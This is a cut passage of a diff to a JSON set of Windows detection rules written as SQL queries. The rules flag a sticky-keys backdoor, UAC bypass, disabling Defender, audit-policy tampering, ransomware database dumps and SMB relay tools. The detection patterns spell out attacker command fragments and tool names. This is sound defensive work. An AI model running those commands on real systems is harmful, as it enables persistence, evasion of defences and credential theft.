"Suspicious Query of MachineGUID", - "id": "f5240972-3938-4e56-8e4b-e33893176c1f", - "status": "test", - "description": "Use of reg to get MachineGuid information", - "author": "frack113", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "status": "experimental", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Cryptography%' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%MachineGuid%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_machineguid.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", - "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "test", + "description": "Detects the execution of msiexec.exe from an uncommon directory", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Impersonate Execution", - "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", - "status": "experimental", - "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impersonate.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate software creating script event consumers" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", - "attack.defense_evasion", - "attack.t1562.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "Suspicious CodePage Switch Via CHCP", - "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "title": "New Port Forwarding Rule Added Via Netsh.EXX", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "status": "test", - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ - "attack.t1036", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Administrative activity (adjust code pages according to your organization's region)" + "Legitimate administration activity", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%i %' ESCAPE '\\' AND CommandLine LIKE '%p %' ESCAPE '\\' AND CommandLine LIKE '%a %' ESCAPE '\\' AND CommandLine LIKE '%v %' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_chcp_codepage_switch.yml" + "filename": "proc_creation_win_netsh_port_forwarding.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "title": "Potential Commandline Obfuscation Using Escape Characters", + "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential commandline obfuscation using known escape characters", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1140" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dinjector.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" }, { - "title": "Application Whitelisting Bypass via PresentationHost.exe", - "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" + "Legitimate use of Nim on a developer systems" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_lolbin_presentationhost.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", - "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", - "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "test", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Potential SMB Relay Attack Tool Execution", - "id": "5589ab4f-a767-433c-961d-c91f3f704db1", - "status": "test", - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate files with these rare hacktool names" + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%PetitPotam%' ESCAPE '\\' OR NewProcessName LIKE '%RottenPotato%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotato%' ESCAPE '\\' OR NewProcessName LIKE '%JuicyPotato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR NewProcessName LIKE '%Juicy Potato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%HotPotatoes6%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes7%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", @@ -17837,15161 +17401,15313 @@ "filename": "proc_creation_win_odbcconf_susp_exec.yml" }, { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "title": "Shadow Copies Creation Using Operating Systems Utilities", + "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, - { - "title": "HackTool - winPEAS Execution", - "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", - "status": "experimental", - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", - "author": "Georg Lauenstein (sure[secure])", + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Legitimate administrator working with shadow copies, access for backup purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'winPEAS.exe' OR (NewProcessName LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_winpeas.yml" + "filename": "proc_creation_win_susp_shadow_copies_creation.yml" }, { - "title": "Suspicious Mofcomp Execution", - "id": "1dd05363-104e-4b4a-b963-196a534b03a1", - "status": "experimental", - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LOLBIN Execution Of The 